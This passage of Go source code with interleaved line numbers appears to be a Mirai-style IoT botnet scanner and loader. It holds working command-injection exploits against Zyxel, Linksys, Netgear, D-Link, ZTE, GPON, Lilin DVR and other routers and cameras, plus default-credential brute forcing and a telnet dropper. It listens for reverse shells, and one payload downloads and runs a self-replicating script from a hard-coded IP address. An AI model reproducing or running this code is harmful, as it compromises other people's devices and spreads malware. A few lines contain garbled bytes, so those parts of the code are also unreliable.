fmt.Printf("\x1b[38;5;46mTotolink\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
2130
payloadSent++
2131
break
2132
}
2133
}
2134
2135
zeroByte(rdbuf)
2136
conn.Close()
2137
}
2138
}
2139
2140
func infectFunctionZyxel(target string) {
2141
2142
var rdbuf []byte = []byte("")
2143
2144
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2145
if err != nil {
2146
return
2147
}
2148
2149
conn.Write([]byte("GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3B" + zyxelPayload + "+%23&password=asdf HTTP/1.1\r\nHost: " + target + "\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozila/5.0\r\n\r\n"))
2150
2151
for {
2152
tmpbuf := make([]byte, 128)
2153
ln, err := conn.Read(tmpbuf)
2154
if ln <= 0 || err != nil {
2155
break
2156
}
2157
2158
rdbuf = append(rdbuf, tmpbuf...)
2159
if strings.Contains(string(rdbuf), "errcode:5") {
2160
fmt.Printf("\x1b[38;5;46mZyxel\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2161
payloadSent++
2162
break
2163
}
2164
}
2165
2166
zeroByte(rdbuf)
2167
conn.Close()
2168
}
2169
2170
func infectFunctionAlcatel(target string) {
2171
2172
var rdbuf []byte = []byte("")
2173
2174
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2175
if err != nil {
2176
return
2177
}
2178
2179
conn.Write([]byte("GET /cgi-bin/masterCGI?ping=nomip&user=;" + alcatelPayload + "; HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))
2180
2181
tmpbuf := make([]byte, 128)
2182
ln, err := conn.Read(tmpbuf)
2183
if ln <= 0 || err != nil {
2184
conn.Close()
2185
}
2186
2187
zeroByte(rdbuf)
2188
conn.Close()
2189
}
2190
2191
func infectFunctionLilinDvr(target string) {
2192
2193
var authPos int = -1
2194
var pathPos int = -1
2195
var logins = [...]string{"root:icatch99", "report:8Jg0SR8K50", "report:report", "root:root", "admin:admin", "admin:123456", "admin:654321", "admin:1111", "admin:admin123", "admin:1234", "admin:12345"}
2196
var paths = [...]string{"/dvr/cmd", "/cn/cmd"}
2197
2198
for i := 0; i < len(logins); i++ {
2199
logins[i] = base64.StdEncoding.EncodeToString([]byte(logins[i]))
2200
}
2201
2202
cntLen := 292
2203
cntLen += len(lilinPayload)
2204
cntLenString := strconv.Itoa(cntLen)
2205
bytebuf := make([]byte, 512)
2206
2207
for i := 0; i < len(logins); i++ {
2208
2209
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2210
if err != nil {
2211
break
2212
}
2213
2214
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nAuthorization: Basic " + logins[i] + "\r\n\r\n"))
2215
2216
bytebuf := make([]byte, 2048)
2217
l, err := conn.Read(bytebuf)
2218
if err != nil || l <= 0 {
2219
zeroByte(bytebuf)
2220
conn.Close()
2221
return
2222
}
2223
2224
if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
2225
authPos = i
2226
zeroByte(bytebuf)
2227
conn.Close()
2228
break
2229
} else {
2230
zeroByte(bytebuf)
2231
conn.Close()
2232
continue
2233
}
2234
}
2235
2236
if (authPos == -1) {
2237
return
2238
}
2239
2240
for i := 0; i < len(paths); i++ {
2241
2242
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2243
if err != nil {
2244
break
2245
}
2246
2247
conn.Write([]byte("POST " + paths[i] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: " + cntLenString + "\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov&" + lilinPayload + ";echo DONE\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))
2248
2249
bytebuf := make([]byte, 2048)
2250
l, err := conn.Read(bytebuf)
2251
if err != nil || l <= 0 {
2252
zeroByte(bytebuf)
2253
conn.Close()
2254
continue
2255
}
2256
2257
if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
2258
pathPos = i
2259
zeroByte(bytebuf)
2260
conn.Close()
2261
fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2262
payloadSent++
2263
break
2264
} else {
2265
zeroByte(bytebuf)
2266
conn.Close()
2267
continue
2268
}
2269
}
2270
2271
if (pathPos != -1) {
2272
2273
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2274
if err != nil {
2275
return
2276
}
2277
2278
conn.Write([]byte("POST " + paths[pathPos] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: 281\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))
2279
2280
bytebuf = make([]byte, 2048)
2281
l, err := conn.Read(bytebuf)
2282
if err != nil || l <= 0 {
2283
zeroByte(bytebuf)
2284
conn.Close()
2285
return
2286
}
2287
2288
if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
2289
fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2290
payloadSent++
2291
}
2292
2293
zeroByte(bytebuf)
2294
conn.Close()
2295
}
2296
2297
return
2298
}
2299
2300
func infectFunctionLinksys(target string) {
2301
2302
var rdbuf []byte = []byte("")
2303
2304
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2305
if err != nil {
2306
return
2307
}
2308
2309
var cntLen int = 102
2310
cntLen += len(linksysPayload)
2311
2312
cntLneStr := strconv.Itoa(cntLen)
2313
2314
conn.Write([]byte("POST /tmUnblock.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + cntLneStr + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsubmit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60" + linksysPayload + "%60&StartEPI=1\r\n\r\n"))
2315
2316
tmpbuf := make([]byte, 128)
2317
ln, err := conn.Read(tmpbuf)
2318
if ln <= 0 || err != nil {
2319
conn.Close()
2320
}
2321
2322
if strings.Contains(string(tmpbuf), "200") || strings.Contains(string(tmpbuf), "301") || strings.Contains(string(tmpbuf), "302") {
2323
fmt.Printf("\x1b[38;5;46mLinksys\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2324
}
2325
2326
zeroByte(rdbuf)
2327
conn.Close()
2328
}
2329
2330
func infectFunctionMagic(target string) {
2331
2332
ipslit := strings.Split(target, ":")
2333
2334
for i := 0; i < len(magicPorts); i++ {
2335
portVal := strconv.Itoa(magicPorts[i])
2336
magicGroup.Add(1)
2337
go infectFunctionMagicProto(ipslit[0] + ":" + portVal)
2338
}
2339
2340
magicGroup.Wait()
2341
}
2342
2343
func infectFunctionDlink(target string) {
2344
2345
var rdbuf []byte = []byte("")
2346
2347
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2348
if err != nil {
2349
return
2350
}
2351
2352
rand.Seed(time.Now().UnixNano())
2353
telnetPort := rand.Intn(50000) + 10000
2354
2355
conn.Write([]byte("POST /command.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\n\r\ncmd=telnetd%20-p%20" + strconv.Itoa(telnetPort) + "\r\n\r\n"))
2356
2357
tmpbuf := make([]byte, 128)
2358
ln, err := conn.Read(tmpbuf)
2359
if ln <= 0 || err != nil {
2360
conn.Close()
2361
}
2362
2363
time.Sleep(10 * time.Second)
2364
ipslit := strings.Split(target, ":")
2365
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderDlinkTag)
2366
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mpsl", loaderDlinkTag)
2367
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm7", loaderDlinkTag)
2368
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm", loaderDlinkTag)
2369
zeroByte(rdbuf)
2370
conn.Close()
2371
}
2372
2373
func infectFunctionZyxelTwo(target string) {
2374
2375
var rdbuf []byte = []byte("")
2376
2377
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2378
if err != nil {
2379
return
2380
}
2381
2382
var cntLen int = 119
2383
cntLen += len(zyxelPayloadTwo)
2384
2385
conn.Write([]byte("POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozia/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nremote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3B" + zyxelPayloadTwo + "%3B%23&remoteSubmit=Save^[[A\r\n\r\n"))
2386
2387
tmpbuf := make([]byte, 128)
2388
ln, err := conn.Read(tmpbuf)
2389
if ln <= 0 || err != nil {
2390
conn.Close()
2391
}
2392
2393
zeroByte(rdbuf)
2394
conn.Close()
2395
}
2396
2397
func infectFunctionNetgear(target string) {
2398
2399
var rdbuf []byte = []byte("")
2400
2401
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2402
if err != nil {
2403
return
2404
}
2405
2406
var cntLen int = 42
2407
cntLen += len(netgearPayload)
2408
2409
conn.Write([]byte("POST /dnslookup.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nhost_name=www.google.com%3B+" + netgearPayload + "&lookup=Lookup\r\n\r\n"))
2410
2411
tmpbuf := make([]byte, 128)
2412
ln, err := conn.Read(tmpbuf)
2413
if ln <= 0 || err != nil {
2414
conn.Close()
2415
}
2416
2417
zeroByte(rdbuf)
2418
conn.Close()
2419
}
2420
2421
func infectFunctionZte(target string) {
2422
2423
var rdbuf []byte = []byte("")
2424
2425
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2426
if err != nil {
2427
return
2428
}
2429
2430
var cntLen int = 80
2431
cntLen += len(ztePayload)
2432
2433
conn.Write([]byte("POST /web_shell_cmd.gch HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=" + ztePayload + "&CmdAck=\r\n\r\n"))
2434
2435
tmpbuf := make([]byte, 128)
2436
ln, err := conn.Read(tmpbuf)
2437
if ln <= 0 || err != nil {
2438
conn.Close()
2439
}
2440
2441
zeroByte(rdbuf)
2442
conn.Close()
2443
}
2444
2445
func infectFunctionNetgearTwo(target string) {
2446
2447
var rdbuf []byte = []byte("")
2448
2449
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2450
if err != nil {
2451
return
2452
}
2453
2454
conn.Write([]byte("GET /None?writeData=true&reginfo=0&macAddress=%20001122334455%20-c%200%20;" + netgearPayload + ";%20echo%20 HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2455
2456
tmpbuf := make([]byte, 128)
2457
ln, err := conn.Read(tmpbuf)
2458
if ln <= 0 || err != nil {
2459
conn.Close()
2460
}
2461
2462
zeroByte(rdbuf)
2463
conn.Close()
2464
}
2465
2466
func infectFunctionNetgearThree(target string) {
2467
2468
var rdbuf []byte = []byte("")
2469
2470
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2471
if err != nil {
2472
return
2473
}
2474
2475
var cntLen int = 81
2476
cntLen += len(netgearPayload)
2477
2478
conn.Write([]byte("POST /ping.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nreferer: " + target + "/DIAG_diag.htm\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nIPAddr1=12&IPAddr2=12&IPAddr3=12&IPAddr4=12&ping=Ping&ping_IPAddr=12.12.12.12%3B+" + netgearPayload+ "\r\n\r\n"))
2479
2480
tmpbuf := make([]byte, 128)
2481
ln, err := conn.Read(tmpbuf)
2482
if ln <= 0 || err != nil {
2483
conn.Close()
2484
}
2485
2486
zeroByte(rdbuf)
2487
conn.Close()
2488
}
2489
2490
func infectFunctionNetgearFour(target string) {
2491
2492
var rdbuf []byte = []byte("")
2493
2494
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2495
if err != nil {
2496
return
2497
}
2498
2499
conn.Write([]byte("GET /cgi-bin/;" + netgearPayload + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2500
2501
tmpbuf := make([]byte, 128)
2502
ln, err := conn.Read(tmpbuf)
2503
if ln <= 0 || err != nil {
2504
conn.Close()
2505
}
2506
2507
zeroByte(rdbuf)
2508
conn.Close()
2509
}
2510
2511
func infectFunctionGponOG(target string) {
2512
2513
var rdbuf []byte = []byte("")
2514
2515
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2516
if err != nil {
2517
return
2518
}
2519
2520
var cntLen int = 68
2521
cntLen += len(gponOGPayload)
2522
2523
conn.Write([]byte("POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%60" + gponOGPayload + "&ipv=0\r\n\r\n"))
2524
2525
tmpbuf := make([]byte, 128)
2526
ln, err := conn.Read(tmpbuf)
2527
if ln <= 0 || err != nil {
2528
conn.Close()
2529
}
2530
2531
zeroByte(rdbuf)
2532
conn.Close()
2533
}
2534
2535
func infectFunctionLinksysTwo(target string) {
2536
2537
var rdbuf []byte = []byte("")
2538
2539
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2540
if err != nil {
2541
return
2542
}
2543
2544
var cntLen int = 159
2545
cntLen += len(linksysTwoPayload)
2546
2547
conn.Write([]byte("POST /apply.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_size=%26" + linksysTwoPayload + "&ping_times=5&traceroute_ip=127.0.0.1\r\n\r\n"))
2548
2549
tmpbuf := make([]byte, 128)
2550
ln, err := conn.Read(tmpbuf)
2551
if ln <= 0 || err != nil {
2552
conn.Close()
2553
}
2554
2555
zeroByte(rdbuf)
2556
conn.Close()
2557
}
2558
2559
func infectFunctionLinksysThree(target string) {
2560
2561
var rdbuf []byte = []byte("")
2562
2563
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2564
if err != nil {
2565
return
2566
}
2567
2568
var cntLen int = 23
2569
cntLen += len(linksysTwoPayload)
2570
2571
conn.Write([]byte("POST /debug.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: python-requests/2.21.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic R2VtdGVrOmdlbXRla3N3ZA==\r\n\r\ndata1=" + linksysTwoPayload + "&command=ui_debug\r\n\r\n"))
2572
2573
tmpbuf := make([]byte, 128)
2574
ln, err := conn.Read(tmpbuf)
2575
if ln <= 0 || err != nil {
2576
conn.Close()
2577
}
2578
2579
zeroByte(rdbuf)
2580
conn.Close()
2581
}
2582
2583
func infectFunctionDlinkTwo(target string) {
2584
2585
var rdbuf []byte = []byte("")
2586
2587
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2588
if err != nil {
2589
return
2590
}
2591
2592
var cntLen int = 91
2593
cntLen += len(dlinkTwoPayload)
2594
2595
conn.Write([]byte("POST /setSystemCommand HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nAuthorization: Basic YWRtaW46\r\n\r\nReplySuccessPage=docmd.htm&ReplyErrorPage=docmd.htm&SystemCommand=" + dlinkTwoPayload + "&ConfigSystemCommand=Save\r\n\r\n"))
2596
2597
tmpbuf := make([]byte, 128)
2598
ln, err := conn.Read(tmpbuf)
2599
if ln <= 0 || err != nil {
2600
conn.Close()
2601
}
2602
2603
zeroByte(rdbuf)
2604
conn.Close()
2605
}
2606
2607
func infectFunctionDlinkThree(target string) {
2608
2609
var rdbuf []byte = []byte("")
2610
2611
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2612
if err != nil {
2613
return
2614
}
2615
2616
var cntLen int = 20
2617
cntLen += len(dlinkTwoPayload)
2618
2619
conn.Write([]byte("POST /diagnostic.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\n\r\nact=ping&dst=%26 " + dlinkTwoPayload + "%26\r\n\r\n"))
2620
2621
tmpbuf := make([]byte, 128)
2622
ln, err := conn.Read(tmpbuf)
2623
if ln <= 0 || err != nil {
2624
conn.Close()
2625
}
2626
2627
zeroByte(rdbuf)
2628
conn.Close()
2629
}
2630
2631
func infectFunctionDlinkFour(target string) {
2632
2633
var rdbuf []byte = []byte("")
2634
2635
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2636
if err != nil {
2637
return
2638
}
2639
2640
conn.Write([]byte("GET /cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;" + dlinkTwoPayload +";echo%207yeB8BQB2ycGRCT8LmsmttUWPggWykhK; HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2641
2642
tmpbuf := make([]byte, 128)
2643
ln, err := conn.Read(tmpbuf)
2644
if ln <= 0 || err != nil {
2645
conn.Close()
2646
}
2647
2648
zeroByte(rdbuf)
2649
conn.Close()
2650
}
2651
2652
func infectFunctionDlinkFive(target string) {
2653
2654
var rdbuf []byte = []byte("")
2655
2656
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2657
if err != nil {
2658
return
2659
}
2660
2661
conn.Write([]byte("GET /login.cgi?cli=multilingual%20show';" + dlinkTwoPayload + "'$ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2662
2663
tmpbuf := make([]byte, 128)
2664
ln, err := conn.Read(tmpbuf)
2665
if ln <= 0 || err != nil {
2666
conn.Close()
2667
}
2668
2669
zeroByte(rdbuf)
2670
conn.Close()
2671
}
2672
2673
func infectFunctionDlinkSix(target string) {
2674
2675
var rdbuf []byte = []byte("")
2676
2677
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2678
if err != nil {
2679
return
2680
}
2681
2682
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nCookie: i=`" + dlinkTwoPayload + "`\r\n\r\n"))
2683
2684
tmpbuf := make([]byte, 128)
2685
ln, err := conn.Read(tmpbuf)
2686
if ln <= 0 || err != nil {
2687
conn.Close()
2688
}
2689
2690
zeroByte(rdbuf)
2691
conn.Close()
2692
}
2693
2694
func infectFunctionDlinkSeven(target string) {
2695
2696
var rdbuf []byte = []byte("")
2697
2698
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2699
if err != nil {
2700
return
2701
}
2702
2703
conn.Write([]byte("POST /hedwig.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: uid=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���*vk3aG0Vgy2692qgW�ٰ*crxdla7qucxf�ذ*qzoFOTyzL063ZRDecd /tmp;wget http://37.0.11.220/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh;\r\nContent-Length: 15\r\n\r\nL0PTJUj=NX9zke5\r\n\r\n"))
2704
2705
tmpbuf := make([]byte, 128)
2706
ln, err := conn.Read(tmpbuf)
2707
if ln <= 0 || err != nil {
2708
conn.Close()
2709
}
2710
2711
zeroByte(rdbuf)
2712
conn.Close()
2713
}
2714
2715
func infectFunctionDlinkEight(target string) {
2716
2717
var rdbuf []byte = []byte("")
2718
2719
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2720
if err != nil {
2721
return
2722
}
2723
2724
conn.Write([]byte("POST /HNAP1/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && " + dlinkThreePayload + "`\"\r\nContent-Length: 0\r\n\r\n"))
2725
2726
tmpbuf := make([]byte, 128)
2727
ln, err := conn.Read(tmpbuf)
2728
if ln <= 0 || err != nil {
2729
conn.Close()
2730
}
2731
2732
zeroByte(rdbuf)
2733
conn.Close()
2734
}
2735
2736
2737
func scannerAddExploit(name string, function interface{}) {
2738
2739
exploitMap[name] = function
2740
}
2741
2742
func scannerInitExploits() {
2743
2744
exploitMap = make(map[string]interface{})
2745
2746
scannerAddExploit("Basic realm=\"DVR\"", infectFunctionLilinDvr)
2747
scannerAddExploit("uc-httpd 1.0.0", infectFunctionUchttpd)
2748
scannerAddExploit("AuthInfo:", infectFunctionTvt)
2749
scannerAddExploit("CMS Web Viewer", infectFunctionMagic)
2750
scannerAddExploit("Server: GoAhead-Webs", infectFunctionFiberhome)
2751
scannerAddExploit("Server: DWS", infectFunctionVigor)
2752
scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionComtrend)
2753
scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionBroadcom)
2754
scannerAddExploit("Server: Boa/0.93.15", infectFunctionGponFiber)
2755
scannerAddExploit("TOTOLINK", infectFunctionTotolink)
2756
scannerAddExploit("Server: Boa/0.94.14", infectFunctionRealtek)
2757
scannerAddExploit("Basic realm=\"Server Status\"", infectFunctionHongdian)
2758
scannerAddExploit("Server: Http Server", infectFunctionTenda)
2759
scannerAddExploit(",/playzone,/", infectFunctionZyxel)
2760
scannerAddExploit("Linksys E", infectFunctionLinksys)
2761
2762
// Exploit spray for devices we cant identify
2763
scannerAddExploit("HTTP/1.", infectFunctionAlcatel)
2764
scannerAddExploit("HTTP/1.", infectFunctionZyxelTwo)
2765
scannerAddExploit("HTTP/1.", infectFunctionZte)
2766
scannerAddExploit("HTTP/1.", infectFunctionNetgear)
2767
scannerAddExploit("HTTP/1.", infectFunctionNetgearTwo)
2768
scannerAddExploit("HTTP/1.", infectFunctionNetgearThree)
2769
scannerAddExploit("HTTP/1.", infectFunctionNetgearFour)
2770
scannerAddExploit("HTTP/1.", infectFunctionGponOG)
2771
scannerAddExploit("HTTP/1.", infectFunctionLinksysTwo)
2772
scannerAddExploit("HTTP/1.", infectFunctionLinksysThree)
2773
scannerAddExploit("HTTP/1.", infectFunctionDlink)
2774
scannerAddExploit("HTTP/1.", infectFunctionDlinkTwo)
2775
scannerAddExploit("HTTP/1.", infectFunctionDlinkThree)
2776
scannerAddExploit("HTTP/1.", infectFunctionDlinkFour)
2777
scannerAddExploit("HTTP/1.", infectFunctionDlinkFive)
2778
scannerAddExploit("HTTP/1.", infectFunctionDlinkSix)
2779
scannerAddExploit("HTTP/1.", infectFunctionDlinkSeven)
2780
scannerAddExploit("HTTP/1.", infectFunctionDlinkEight)
2781
2782
}
2783
2784
func httpBannerCheck(target string) {
2785
2786
conn, err := net.DialTimeout("tcp", target, netTimeout * time.Second)
2787
if err != nil {
2788
workerGroup.Done()
2789
return
2790
}
2791
2792
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))
2793
2794
for {
2795
bytebuf := make([]byte, 2048)
2796
l, err := conn.Read(bytebuf)
2797
if err != nil || l <= 0 {
2798
zeroByte(bytebuf)
2799
conn.Close()
2800
workerGroup.Done()
2801
return
2802
}
2803
2804
for key, element := range exploitMap {
2805
if strings.Contains(string(bytebuf), key) {
2806
switch function := element.(type) {
2807
case func(string):
2808
function(target)
2809
default:
2810
break
2811
}
2812
}
2813
}
2814
}
2815
2816
workerGroup.Done()
2817
return
2818
}
2819
2820
func main() {
2821
2822
go func() {
2823
i := 0
2824
for {
2825
fmt.Printf("%d's | Payload Sent: %d | Telnet Opened: %d\r\n", i, payloadSent, telShells)
2826
time.Sleep(1 * time.Second)
2827
i++
2828
}
2829
} ()
2830
2831
dropperMap = make(map[string]echoDropper)
2832
telnetLoadDroppers()
2833
scannerInitExploits()
2834
2835
li, err := net.Listen("tcp", "0.0.0.0:" + strconv.Itoa(ucRshellPort))
2836
if err != nil {
2837
return
2838
}
2839
2840
recvServ, err := net.Listen("tcp", "0.0.0.0:19412")
2841
if err != nil {
2842
return
2843
}
2844
2845
go func() {
2846
for {
2847
conn, err := li.Accept()
2848
if err != nil {
2849
break
2850
}
2851
2852
go reverseShellUchttpdLoader(conn)
2853
}
2854
} ()
2855
2856
go func() {
2857
for {
2858
conn, err := recvServ.Accept()
2859
if err != nil {
2860
break
2861
}
2862
2863
for {
2864
buf := make([]byte, 32)
2865
l, err := conn.Read(buf)
2866
if l <= 0 || err != nil {
2867
conn.Close()
2868
break
2869
}
2870
2871
workerGroup.Add(1)
2872
go httpBannerCheck(string(buf))
2873
}
2874
}
2875
} ()
2876
2877
for {
2878
reader := bufio.NewReader(os.Stdin)
2879
input := bufio.NewScanner(reader)
2880
2881
for input.Scan() {
2882
if os.Args[1] == "listen" {
2883
workerGroup.Add(1)
2884
go httpBannerCheck(input.Text())
2885
} else {
2886
workerGroup.Add(1)
2887
go httpBannerCheck(input.Text() + ":" + os.Args[1])
2888
}
2889
}
2890
}
2891
}
2892
2893